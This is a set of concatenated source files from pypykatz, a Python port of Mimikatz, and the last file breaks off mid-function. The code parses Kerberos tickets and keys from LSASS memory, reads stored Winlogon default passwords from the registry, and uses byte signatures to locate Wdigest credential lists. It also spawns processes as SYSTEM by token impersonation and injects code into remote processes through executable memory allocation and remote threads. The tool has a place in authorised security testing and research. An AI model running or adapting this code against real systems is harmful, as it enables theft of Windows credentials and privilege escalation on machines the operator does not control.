		res.ServiceName = await PKERB_EXTERNAL_NAME.load(reader)
		res.TargetName  = await PKERB_EXTERNAL_NAME.load(reader)
		res.DomainName          = await LSA_UNICODE_STRING.load(reader)
		res.TargetDomainName    = await LSA_UNICODE_STRING.load(reader)
		res.Description         = await LSA_UNICODE_STRING.load(reader)
		res.AltTargetDomainName = await LSA_UNICODE_STRING.load(reader)
		res.KDCServer           = await LSA_UNICODE_STRING.load(reader)    				#	//?(reader).value
		res.unk10586_d          = await LSA_UNICODE_STRING.load(reader)					#//?(reader).value
		res.ClientName = await PKERB_EXTERNAL_NAME.load(reader)
		res.name0 = await PVOID.loadvalue(reader)
		x = await reader.read(4)
		res.TicketFlags = int.from_bytes(x, byteorder = 'big', signed = False)
		res.unk2       = await ULONG.loadvalue(reader)
		res.unk14393_0 = await PVOID.loadvalue(reader)
		res.unk2x       = await ULONG.loadvalue(reader)
		res.KeyType    = await ULONG.loadvalue(reader)
		res.Key = await KIWI_KERBEROS_BUFFER.load(reader)
		res.unk14393_1 = await PVOID.loadvalue(reader)
		res.unk3       = await PVOID.loadvalue(reader)										# // ULONG		KeyType2 = (reader).value
		res.unk4       = await PVOID.loadvalue(reader)										# // KIWI_KERBEROS_BUFFER	Key2 = (reader).value
		res.unk5       = await PVOID.loadvalue(reader)										# // up(reader).value
		res.StartTime  = await FILETIME.loadvalue(reader)
		res.EndTime    = await FILETIME.loadvalue(reader)
		res.RenewUntil = await FILETIME.loadvalue(reader)
		res.unk6 = await ULONG.loadvalue(reader)
		res.unk7 = await ULONG.loadvalue(reader)
		res.domain = await PCWSTR.loadvalue(reader)
		res.unk8 = await ULONG.loadvalue(reader)
		await reader.align()
		res.strangeNames  = await PVOID.loadvalue(reader)
		res.unk9          = await ULONG.loadvalue(reader)
		res.TicketEncType = await ULONG.loadvalue(reader)
		res.TicketKvno    = await ULONG.loadvalue(reader)
		await reader.align()
		res.Ticket = await KIWI_KERBEROS_BUFFER.load(reader)

		return res

class PKIWI_KERBEROS_INTERNAL_TICKET_10_1607(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_INTERNAL_TICKET_10_1607()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_INTERNAL_TICKET_10_1607
		return p

		
class KIWI_KERBEROS_INTERNAL_TICKET_10_1607:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.unk0 = None
		self.unk1 = None
		self.ServiceName = None
		self.TargetName = None
		self.DomainName = None
		self.TargetDomainName = None
		self.Description = None
		self.AltTargetDomainName = None
		self.KDCServer = None
		self.unk10586_d = None
		self.ClientName = None
		self.name0 = None
		self.TicketFlags = None
		self.unk2 = None
		self.unk14393_0 = None
		self.KeyType = None
		self.Key = None
		self.unk14393_1 = None
		self.unk3 = None
		self.unk4 = None
		self.unk5 = None
		self.StartTime = None
		self.EndTime = None
		self.RenewUntil = None
		self.unk6 = None
		self.unk7 = None
		self.domain = None
		self.unk8 = None
		self.strangeNames = None
		self.unk9 = None
		self.TicketEncType = None
		self.TicketKvno = None
		self.Ticket = None
	

	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_INTERNAL_TICKET_10_1607()
		res.Flink = await PKIWI_KERBEROS_INTERNAL_TICKET_10_1607.load(reader)
		res.Blink = await PKIWI_KERBEROS_INTERNAL_TICKET_10_1607.load(reader)
		res.unk0 = await PVOID.loadvalue(reader)
		res.unk1 = await PVOID.loadvalue(reader)
		res.ServiceName = await PKERB_EXTERNAL_NAME.load(reader)
		res.TargetName  = await PKERB_EXTERNAL_NAME.load(reader)
		res.DomainName          = await LSA_UNICODE_STRING.load(reader)
		res.TargetDomainName    = await LSA_UNICODE_STRING.load(reader)
		res.Description         = await LSA_UNICODE_STRING.load(reader)
		res.AltTargetDomainName = await LSA_UNICODE_STRING.load(reader)
		res.KDCServer           = await LSA_UNICODE_STRING.load(reader)    				#	//?(reader).value
		res.unk10586_d          = await LSA_UNICODE_STRING.load(reader)					#//?(reader).value
		res.ClientName = await PKERB_EXTERNAL_NAME.load(reader)
		res.name0 = await PVOID.loadvalue(reader)
		x = await reader.read(4)
		res.TicketFlags = int.from_bytes(x, byteorder = 'big', signed = False)
		res.unk2       = await ULONG.loadvalue(reader)
		res.unk14393_0 = await PVOID.loadvalue(reader)
		res.KeyType    = await ULONG.loadvalue(reader)
		await reader.align()
		res.Key = await KIWI_KERBEROS_BUFFER.load(reader)
		res.unk14393_1 = await PVOID.loadvalue(reader)
		res.unk3       = await PVOID.loadvalue(reader)										# // ULONG		KeyType2 = (reader).value
		res.unk4       = await PVOID.loadvalue(reader)										# // KIWI_KERBEROS_BUFFER	Key2 = (reader).value
		res.unk5       = await PVOID.loadvalue(reader)										# // up(reader).value
		res.StartTime  = await FILETIME.loadvalue(reader)
		res.EndTime    = await FILETIME.loadvalue(reader)
		res.RenewUntil = await FILETIME.loadvalue(reader)
		res.unk6 = await ULONG.loadvalue(reader)
		res.unk7 = await ULONG.loadvalue(reader)
		res.domain = await PCWSTR.loadvalue(reader)
		res.unk8 = await ULONG.loadvalue(reader)
		await reader.align()
		res.strangeNames  = await PVOID.loadvalue(reader)
		res.unk9          = await ULONG.loadvalue(reader)
		res.TicketEncType = await ULONG.loadvalue(reader)
		res.TicketKvno    = await ULONG.loadvalue(reader)
		await reader.align()
		res.Ticket = await KIWI_KERBEROS_BUFFER.load(reader)

		return res

class PKERB_HASHPASSWORD_GENERIC(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKERB_HASHPASSWORD_GENERIC()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KERB_HASHPASSWORD_GENERIC
		return p
		
class KERB_HASHPASSWORD_GENERIC:
	def __init__(self):
		self.Type = None
		self.Size = None
		self.Checksump = None

	@staticmethod
	async def load(reader):
		res = KERB_HASHPASSWORD_GENERIC()
		res.Type = await DWORD.loadvalue(reader)
		await reader.align()
		res.Size      = await SIZE_T.loadvalue(reader)
		res.Checksump = await PVOID.loadvalue(reader)
		return res
	

class PKERB_HASHPASSWORD_5(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKERB_HASHPASSWORD_5()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KERB_HASHPASSWORD_5
		return p
		
class KERB_HASHPASSWORD_5:
	def __init__(self):
		self.salt = None
		self.generic = None
	
	@staticmethod
	async def load(reader):
		res = KERB_HASHPASSWORD_5()
		res.salt = await LSA_UNICODE_STRING.load(reader) #	// http://tools.ietf.org/html/rfc3962
		res.generic = await KERB_HASHPASSWORD_GENERIC.load(reader)
		return res

class PKERB_HASHPASSWORD_6(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKERB_HASHPASSWORD_6()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KERB_HASHPASSWORD_6
		return p
		
class KERB_HASHPASSWORD_6 :
	def __init__(self):
		self.salt = None
		self.stringToKey = None
		self.generic = None

	@staticmethod
	async def load(reader):
		res = KERB_HASHPASSWORD_6()
		res.salt = await LSA_UNICODE_STRING.load(reader)	#// http://tools.ietf.org/html/rfc3962
		res.stringToKey = await PVOID.load(reader) # // AES Iterations (dword ?)
		res.generic = await KERB_HASHPASSWORD_GENERIC.load(reader)
		return res

class PKERB_HASHPASSWORD_6_1607(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKERB_HASHPASSWORD_6_1607()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KERB_HASHPASSWORD_6_1607
		return p


class KERB_HASHPASSWORD_6_1607:
	def __init__(self):
		self.salt = None
		self.stringToKey = None
		self.unk0 = None
		self.generic = None
	
	@staticmethod
	async def load(reader):
		res = KERB_HASHPASSWORD_6_1607()
		res.salt = await LSA_UNICODE_STRING.load(reader)  #	// http://tools.ietf.org/html/rfc3962(reader).value
		res.stringToKey = await PVOID.loadvalue(reader)        # // AES Iterations (dword ?)(reader).value
		res.unk0 = await PVOID.loadvalue(reader)
		res.generic = await KERB_HASHPASSWORD_GENERIC.load(reader)
		return res

class PKIWI_KERBEROS_KEYS_LIST_5(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_KEYS_LIST_5()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_KEYS_LIST_5
		return p

class KIWI_KERBEROS_KEYS_LIST_5:
	def __init__(self):
		self.unk0 = None
		self.cbItem = None
		self.unk1 = None
		self.unk2 = None
		#//KERB_HASHPASSWORD_5 KeysEntries[ANYSIZE_ARRAY] = (reader).value
		self.KeyEntries_start = None
		self.KeyEntries = []

	async def read(self, reader, keyentries_type):
		await reader.move(self.KeyEntries_start)
		for _ in range(self.cbItem):
			ke = await keyentries_type.load(reader)
			self.KeyEntries.append(ke)
	
	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_KEYS_LIST_5()
		res.unk0   = await DWORD.loadvalue(reader)		#// dword_1233EC8 dd 4
		res.cbItem = await DWORD.loadvalue(reader)	#// debug048:01233ECC dd 5(reader).value
		res.unk1   = await PVOID.loadvalue(reader)
		res.unk2   = await PVOID.loadvalue(reader)
		res.KeyEntries_start = reader.tell()
		return res


class PKIWI_KERBEROS_KEYS_LIST_6(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_KEYS_LIST_6()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_KEYS_LIST_6
		return p

class KIWI_KERBEROS_KEYS_LIST_6:
	def __init__(self):
		self.unk0   = None	#	// dword_1233EC8 dd 4(reader).value
		self.cbItem = None #	// debug048:01233ECC dd 5(reader).value
		self.unk1   = None
		self.unk2   = None
		self.unk3   = None
		self.unk4   = None
		self.KeyEntries_start = None
		self.KeyEntries = []
		
	async def read(self, reader, keyentries_type):
		await reader.move(self.KeyEntries_start)
		for _ in range(self.cbItem):
			ke = await keyentries_type.load(reader)
			self.KeyEntries.append(ke)
			#//KERB_HASHPASSWORD_6 KeysEntries[ANYSIZE_ARRAY] = (reader).value
	
	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_KEYS_LIST_6()
		res.unk0   = await DWORD.loadvalue(reader)	#	// dword_1233EC8 dd 4(reader).value
		res.cbItem = await DWORD.loadvalue(reader) #	// debug048:01233ECC dd 5(reader).value
		res.unk1   = await PVOID.loadvalue(reader)
		res.unk2   = await PVOID.loadvalue(reader)
		res.unk3   = await PVOID.loadvalue(reader)
		res.unk4   = await PVOID.loadvalue(reader)
		res.KeyEntries_start = reader.tell()
		return res

class PKIWI_KERBEROS_ENUM_DATA_TICKET(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_ENUM_DATA_TICKET()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_ENUM_DATA_TICKET
		return p

class KIWI_KERBEROS_ENUM_DATA_TICKET:
	def __init__(self):
		self.isTicketExport = None
		self.isFullTicket = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_ENUM_DATA_TICKET()
		res.isTicketExport = await BOOL.loadvalue(reader)
		res.isFullTicket   = await BOOL.loadvalue(reader)
		return res
		
class KIWI_KERBEROS_BUFFER:
	def __init__(self):
		self.Length = None
		self.Value = None
		
		##not part of struct
		self.Data = None
		
	async def read(self, reader):
		await reader.move(self.Value.value)
		self.Data = await reader.read(self.Length)
		return self.Data

	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_BUFFER()
		res.Length = await ULONG.loadvalue(reader)
		await reader.align()
		res.Value   = await PVOID.load(reader)
		return res


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

#####
from pypykatz.registry import logger


class SOFTWARE:
	def __init__(self, sam_hive, bootkey):
		self.hive = sam_hive
		self.bootkey = bootkey
		self.default_logon_user = None
		self.default_logon_domain = None
		self.default_logon_password = None
		
	def get_default_logon(self):
		if self.default_logon_user is None:
			try:
				data = self.hive.get_value(r'Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName')[1]
			except:
				pass
			else:
				if isinstance(data, bytes):
					self.default_logon_user = data.decode('utf-16-le').split('\x00')[0]
				else:
					self.default_logon_user = data
		
		if self.default_logon_domain is None:
			try:
				data = self.hive.get_value(r'Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultDomainName')[1]
			except:
				pass
			else:
				if isinstance(data, bytes):
					self.default_logon_domain = data.decode('utf-16-le')
				else:
					self.default_logon_domain = data
		
		if self.default_logon_password is None:
			try:
				data = self.hive.get_value(r'Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultPassword')[1]
			except:
				pass
			else:
				if isinstance(data, bytes):
					self.default_logon_password = data.decode('utf-16-le')
				else:
					self.default_logon_password = data
				
		return self.default_logon_user
		
	def to_dict(self):
		t = {}
		t['default_logon_user'] = self.default_logon_user
		t['default_logon_domain'] = self.default_logon_domain
		t['default_logon_password'] = self.default_logon_password
		return t
		
	def __str__(self):
		t  = '============== SOFTWARE hive secrets ==============\r\n'
		t += 'default_logon_user: %s\r\n' % self.default_logon_user
		return t



#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import os
import logging

def main():
	import argparse
	import glob
	
	from pypykatz import logger
	from pypykatz.utils.crypto.cmdhelper import CryptoCMDHelper
	from pypykatz.ldap.cmdhelper import LDAPCMDHelper
	from pypykatz.kerberos.cmdhelper import KerberosCMDHelper
	from pypykatz.lsadecryptor.cmdhelper import LSACMDHelper
	from pypykatz.registry.cmdhelper import RegistryCMDHelper
	from pypykatz.remote.cmdhelper import RemoteCMDHelper
	from pypykatz.dpapi.cmdhelper import DPAPICMDHelper
	from pypykatz.rdp.cmdhelper import RDPCMDHelper
	from pypykatz.parsers.cmdhelper import ParsersCMDHelper
	
	cmdhelpers = [LSACMDHelper(), RegistryCMDHelper(), CryptoCMDHelper(), KerberosCMDHelper(), RemoteCMDHelper(), DPAPICMDHelper(), LDAPCMDHelper(), RDPCMDHelper(), ParsersCMDHelper()]
	
	try:
		from pypykatz.smb.cmdhelper import SMBCMDHelper
		cmdhelpers.append(SMBCMDHelper())
	except Exception as e:
		print(e)
		pass

	parser = argparse.ArgumentParser(description='Pure Python implementation of Mimikatz --and more--')
	parser.add_argument('-v', '--verbose', action='count', default=0)
	
	subparsers = parser.add_subparsers(help = 'commands')
	subparsers.required = True
	subparsers.dest = 'command'
	
	live_group = subparsers.add_parser('live', help='Get secrets from live machine')
	live_subparsers = live_group.add_subparsers()
	live_subparsers.required = True
	live_subparsers.dest = 'module'
	
	#this is the new cmd helper formet, in beta mode currently
	for helper in cmdhelpers:
		helper.add_args(subparsers, live_subparsers)
	
	
	live_subparser_process_group = live_subparsers.add_parser('process', help='Process creating/manipulation commands')
	
	live_subparser_process_group.add_argument('cmd', choices=['create'])
	live_subparser_process_group.add_argument('-i','--interactive', action = 'store_true', help = 'Spawns a new interactive process')
	live_subparser_process_group.add_argument('--sid', help = 'Impersonate given SID in new process')
	live_subparser_process_group.add_argument('-c', '--cmdline', help = 'The process to execute. Default: cmd.exe')
	
	live_subparser_token_group = live_subparsers.add_parser('token', help='Token creating/manipulation commands')
	live_subparser_token_group.add_argument('cmd', choices=['list', 'current'])
	live_subparser_token_group.add_argument('-f','--force', action='store_true', help= 'Tries to list as many tokens as possible without SE_DEBUG privilege')
	live_subparser_users_group = live_subparsers.add_parser('users', help='User creating/manipulation commands')
	live_subparser_users_group.add_argument('cmd', choices=['list','whoami'])

	version_group = subparsers.add_parser('version', help='version')
	banner_group = subparsers.add_parser('banner', help='banner')
	logo_group = subparsers.add_parser('logo', help='logo')
	
	####### PARSING ARGUMENTS
	
	args = parser.parse_args()
	
	###### VERBOSITY
	if args.verbose == 0:
		logging.basicConfig(level=logging.INFO)
		logger.setLevel(logging.INFO)
	elif args.verbose == 1:
		logging.basicConfig(level=logging.DEBUG)
		logger.setLevel(logging.DEBUG)
	else:
		level = 5 - args.verbose
		logging.basicConfig(level=level)
		logger.setLevel(1)
	
	##### Common obj
	#results = {}
	#files_with_error = []
	
	for helper in cmdhelpers:
		helper.execute(args)
	
	
	###### Live 
	if args.command == 'live':				
		if args.module == 'process':
			if args.cmd == 'create':
				from pypykatz.commons.winapi.processmanipulator import ProcessManipulator
				pm = ProcessManipulator()
				sid = 'S-1-5-18'
				if args.sid is not None:
					sid = args.sid
				
				if args.cmdline is not None:
					cmdline = args.cmdline
				else:
					#looking for the correct path...
					cmdline = os.environ['ComSpec']
				
				pm.create_process_for_sid(target_sid = sid, cmdline = cmdline, interactive = args.interactive)
				return
				
		elif args.module == 'token':
			from pypykatz.commons.winapi.processmanipulator import ProcessManipulator
			if args.cmd == 'list':
				pm = ProcessManipulator()
				for ti in pm.list_all_tokens(args.force):
					print(str(ti))
				return
				
			if args.cmd == 'current':
				pm = ProcessManipulator()
				token_info = pm.get_current_token_info()
				print(str(token_info))
				return
				
		elif args.module == 'users':
			from pypykatz.commons.winapi.machine import LiveMachine
			
			if args.cmd == 'list':
				lm = LiveMachine()
				users = lm.list_users()
				for sid in users:
					print(str(users[sid]))
					
			elif args.cmd == 'whoami':
				lm = LiveMachine()
				user = lm.get_current_user()
				print(str(user))

	elif args.command == 'version':
		from pypykatz._version import __version__
		print(__version__)
	
	elif args.command == 'banner':
		from pypykatz._version import __banner__
		print(__banner__)
	
	elif args.command == 'logo':
		from pypykatz._version import __logo__, __logo_color__
		print(__logo_color__)
		print(__logo__)
					
	
	

if __name__ == '__main__':
	main()



#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

#import io
#from minidump.win_datatypes import *
from pypykatz.commons.common import KatzSystemArchitecture, WindowsMinBuild, WindowsBuild
from pypykatz.alsadecryptor.win_datatypes import LUID, ULONG, POINTER
from pypykatz.alsadecryptor.package_commons import PackageTemplate

class WdigestTemplate(PackageTemplate):
	def __init__(self):
		super().__init__('Wdigest')
		self.signature = None
		self.first_entry_offset = None
		self.list_entry = None
		self.primary_offset = None
	
	@staticmethod
	def get_template(sysinfo):
		template = WdigestTemplate()

		if sysinfo.architecture == KatzSystemArchitecture.X64:
			if WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
				template.signature = b'\x48\x3b\xda\x74'
				template.first_entry_offset = -4
				template.primary_offset = 36
				template.list_entry = PWdigestListEntry
				
			elif WindowsMinBuild.WIN_2K3.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
				template.signature = b'\x48\x3b\xda\x74'
				template.first_entry_offset = -4
				template.primary_offset = 48
				template.list_entry = PWdigestListEntry

			elif sysinfo.buildnumber >= WindowsMinBuild.WIN_VISTA.value:
				template.signature = b'\x48\x3b\xd9\x74'
				template.first_entry_offset = -4
				template.primary_offset = 48
				template.list_entry = PWdigestListEntry
				
			else:
				raise Exception('Could not identify template! Architecture: %s sysinfo.buildnumber: %s' % (sysinfo.architecture, sysinfo.buildnumber))
			
		
		elif sysinfo.architecture == KatzSystemArchitecture.X86:
			if WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
				template.signature = b'\x74\x18\x8b\x4d\x08\x8b\x11'
				template.first_entry_offset = -6
				template.primary_offset = 36
				template.list_entry = PWdigestListEntryNT5

			elif WindowsMinBuild.WIN_2K3.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
				template.signature = b'\x74\x18\x8b\x4d\x08\x8b\x11'
				template.first_entry_offset = -6
				template.primary_offset = 28
				template.list_entry = PWdigestListEntryNT5
								
			elif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:
				template.signature = b'\x74\x11\x8b\x0b\x39\x4e\x10'
				template.first_entry_offset = -6
				template.primary_offset = 32
				template.list_entry = PWdigestListEntry
				
			elif WindowsMinBuild.WIN_BLUE.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_10.value:
				template.signature = b'\x74\x15\x8b\x0a\x39\x4e\x10'
				template.first_entry_offset = -4
				template.primary_offset = 32
				template.list_entry = PWdigestListEntry
			
			elif WindowsMinBuild.WIN_10.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1809.value:
				template.signature = b'\x74\x15\x8b\x0a\x39\x4e\x10'
				template.first_entry_offset = -6
				template.primary_offset = 32
				template.list_entry = PWdigestListEntry
				
			else:
				template.signature = b'\x74\x15\x8b\x17\x39\x56\x10'
				template.first_entry_offset = -6
				template.primary_offset = 32
				template.list_entry = PWdigestListEntry
		
		else:
			raise Exception('Unknown architecture! %s' % sysinfo.architecture)
		
		template.log_template('list_entry', template.list_entry)
		return template
	

class PWdigestListEntry(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PWdigestListEntry()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = WdigestListEntry
		return p
		
class PWdigestListEntryNT5(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PWdigestListEntryNT5()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = WdigestListEntryNT5
		return p
		
class WdigestListEntryNT5:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.this_entry = None
		self.usage_count = None
		self.luid = None

	@staticmethod
	async def load(reader):
		res = WdigestListEntryNT5()
		res.Flink = await PWdigestListEntryNT5.load(reader)
		res.Blink = await PWdigestListEntryNT5.load(reader)
		res.this_entry = await PWdigestListEntryNT5.load(reader)
		res.usage_count = await ULONG.load(reader)
		await reader.align() #8?
		res.luid = await LUID.loadvalue(reader)
		return res

class WdigestListEntry:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.usage_count = None
		self.this_entry = None
		self.luid = None
	
	@staticmethod
	async def load(reader):
		res = WdigestListEntry()
		res.Flink = await PWdigestListEntry.load(reader)
		res.Blink = await PWdigestListEntry.load(reader)
		res.usage_count = await ULONG.load(reader)
		await reader.align() #8?
		res.this_entry = await PWdigestListEntry.load(reader)
		res.luid = await LUID.loadvalue(reader)
		return res


from .common.version import *
from .common.live_reader_ctypes import *
from pypykatz.commons.winapi.local.function_defs.kernel32 import LoadLibraryW, GetProcAddressW, VirtualProtectEx, VirtualAllocEx, VirtualFreeEx, CreateRemoteThread
from pypykatz.commons.winapi.local.function_defs.advapi32 import OpenProcessToken, DuplicateTokenEx
from pypykatz import logger
from minidump.streams.SystemInfoStream import PROCESSOR_ARCHITECTURE
import ntpath
import os
import math

PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Token access rights
TOKEN_ASSIGN_PRIMARY	= 0x0001
TOKEN_DUPLICATE		 = 0x0002
TOKEN_IMPERSONATE	   = 0x0004
TOKEN_QUERY			 = 0x0008
TOKEN_QUERY_SOURCE	  = 0x0010
TOKEN_ADJUST_PRIVILEGES = 0x0020
TOKEN_ADJUST_GROUPS	 = 0x0040
TOKEN_ADJUST_DEFAULT	= 0x0080
TOKEN_ADJUST_SESSIONID  = 0x0100
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY)
TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY |
		TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE |
		TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT |
		TOKEN_ADJUST_SESSIONID)

SecurityAnonymous	   = 0
SecurityIdentification  = 1
SecurityImpersonation   = 2
SecurityDelegation	  = 3

TokenPrimary		= 1
TokenImpersonation  = 2

#dont ask me...
#TOKEN_MANIP_ACCESS = (TOKEN_QUERY | TOKEN_READ | TOKEN_IMPERSONATE | TOKEN_QUERY_SOURCE | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | (131072 | 4))

class Module:
	def __init__(self):
		self.name = None
		self.baseaddress = None
		self.size = None
		self.endaddress = None
		self.pages = []
		
		self.versioninfo = None
		self.checksum = None
		self.timestamp = None
		
	def inrange(self, addr):
		return self.baseaddress <= addr < self.endaddress
	
	@staticmethod
	def parse(name, module_info, timestamp):
		m = Module()
		m.name = name
		m.baseaddress = module_info.lpBaseOfDll
		m.size = module_info.SizeOfImage
		m.endaddress = m.baseaddress + m.size
		
		m.timestamp = timestamp
		
		return m
		
	def __str__(self):
		return '%s %s %s %s %s' % (self.name, hex(self.baseaddress), hex(self.size), hex(self.endaddress), self.timestamp )

class Page:
	def __init__(self):
		self.BaseAddress = None
		self.AllocationBase  = None
		self.AllocationProtect  = None
		self.RegionSize  = None
		self.EndAddress = None
		
		self.data = None
	
	@staticmethod
	def parse(page_info):
		p = Page()
		p.BaseAddress = page_info.BaseAddress
		p.AllocationBase  = page_info.AllocationBase
		p.AllocationProtect  = page_info.AllocationProtect
		p.RegionSize  = min(page_info.RegionSize, 100*1024*1024) # TODO: need this currently to stop infinite search
		p.EndAddress  = page_info.BaseAddress + page_info.RegionSize
		return p
		
	def read_data(self, process_handle):
		self.data = ReadProcessMemory(process_handle, self.BaseAddress, self.RegionSize)
		
	def inrange(self, addr):
		return self.BaseAddress <= addr < self.EndAddress
		
	def search(self, pattern, process_handle):
		if len(pattern) > self.RegionSize:
			return []
		data = ReadProcessMemory(process_handle, self.BaseAddress, self.RegionSize)
		fl = []
		offset = 0
		while len(data) > len(pattern):
			marker = data.find(pattern)
			if marker == -1:
				return fl
			fl.append(marker + offset + self.BaseAddress)
			data = data[marker+1:]
		

class Process:
	def __init__(self, pid = None, name = None, access = PROCESS_ALL_ACCESS, open = True):
		self.pid = pid
		self.name = name
		self.access = access


		self.sysinfo = None
		self.processor_architecture = None


		self.phandle = None
		self.modules = []
		self.pages = []

		if open is True:
			self.open()
	
	def open(self):
		self.sysinfo = GetSystemInfo()
		self.processor_architecture = PROCESSOR_ARCHITECTURE(self.sysinfo.id.w.wProcessorArchitecture)
		if self.phandle is None:
			if self.pid is None:
				if self.name is None:
					raise Exception('Process name or PID or opened handle must be provided')
				
				self.pid = pid_for_name(self.name)
			
			self.phandle = OpenProcess(self.access, False, self.pid)
			if self.phandle is None:
				raise Exception('Failed to open %s(%s) Reason: %s' % (ctypes.WinError(), self.name, self.pid))
	
	def list_modules(self):
		self.modules = []
		module_handles = EnumProcessModules(self.phandle)
		for module_handle in module_handles:
			module_file_path = GetModuleFileNameExW(self.phandle, module_handle)
			logger.log(1, module_file_path)
			timestamp = 0
			if ntpath.basename(module_file_path).lower() == 'msv1_0.dll':
				timestamp = int(os.stat(module_file_path).st_ctime)
				self.msv_dll_timestamp = timestamp
			modinfo = GetModuleInformation(self.phandle, module_handle)
			self.modules.append(Module.parse(module_file_path, modinfo, timestamp))
		return self.modules
	
	def list_pages(self):
		self.pages = []
		current_address = self.sysinfo.lpMinimumApplicationAddress
		while current_address < self.sysinfo.lpMaximumApplicationAddress:
			page_info = VirtualQueryEx(self.phandle, current_address)
			self.pages.append(Page.parse(page_info))
			
			current_address += page_info.RegionSize
	
	def page_find_for_addr(self, addr):
		self.list_pages()
		selected_page = None
		for page in self.pages:
			if page.inrange(addr):
				selected_page = page
		if selected_page is None:
			raise Exception('Address not found in pages!')
		return selected_page

	def page_change_protect(self, addr, flags = PAGE_EXECUTE_READWRITE):
		selected_page = self.page_find_for_addr(addr)
		return VirtualProtectEx(self.phandle, selected_page.BaseAddress, selected_page.RegionSize, flags)

	def page_alloc(self, size, addr = 0, allocation_type = MEM_COMMIT | MEM_RESERVE, allocation_protect = PAGE_EXECUTE_READWRITE):
		return VirtualAllocEx(self.phandle, lpAddress = addr, dwSize = size, flAllocationType = allocation_type, flProtect = allocation_protect)

	def page_free(self, addr, free_type = MEM_RELEASE):
		selected_page = self.page_find_for_addr(addr)
		dwsize = 0 if free_type == MEM_RELEASE else selected_page.RegionSize
		return VirtualFreeEx(self.phandle, selected_page.BaseAddress, dwsize, dwFreeType = free_type)

	def read(self, pos, amount):
		return ReadProcessMemory(self.phandle, pos, amount)

	def write(self, pos, buffer):
		return WriteProcessMemory(self.phandle, pos, buffer)

	def create_thread(self, start_addr):
		return CreateRemoteThread(self.phandle, None, 0, start_addr, None, 0)

	def find_module_by_name(self, module_name):
		if len(self.modules) == 0:
			self.list_modules()
		for module in self.modules:
			#print(module.name)
			if module.name.lower().find(module_name.lower()) != -1:
				#print('Found remote DLL!')
				return module

	def get_remote_function_addr(self, dll_name, function_name, force_load = False):
		module_handle = LoadLibraryW(dll_name)
		#print(module_handle)
		function_addr_total = GetProcAddressW(module_handle, function_name)
		#print('function_addr %s' % hex(function_addr_total))

		modinfo = GetModuleInformation(GetCurrentProcess(), module_handle)
		module = Module.parse(dll_name, modinfo, None)
		function_addr_offset = module.baseaddress - function_addr_total

		#print('function_addr_offset %s' % hex(function_addr_offset))
		
		module = self.find_module_by_name(dll_name)
		if module is None:
			if force_load is True:
				self.load_dll(dll_name)
				self.list_modules()
				module = self.find_module_by_name(dll_name)
			if module is None:
				return None

		return module.baseaddress - function_addr_offset

	@staticmethod
	def int_to_asm(x, bitsize = 64):
		return x.to_bytes(bitsize//8, byteorder = 'little', signed = False)

	def invoke_remote_function(self, enclave, fnc_addr, p1_addr, p2_addr, p3_addr, exitthread_addr):
		#https://docs.microsoft.com/en-us/cpp/build/x64-calling-convention?view=msvc-160
		#https://defuse.ca/online-x86-assembler.htm#disassembly
		
		

		#p1_addr = 0
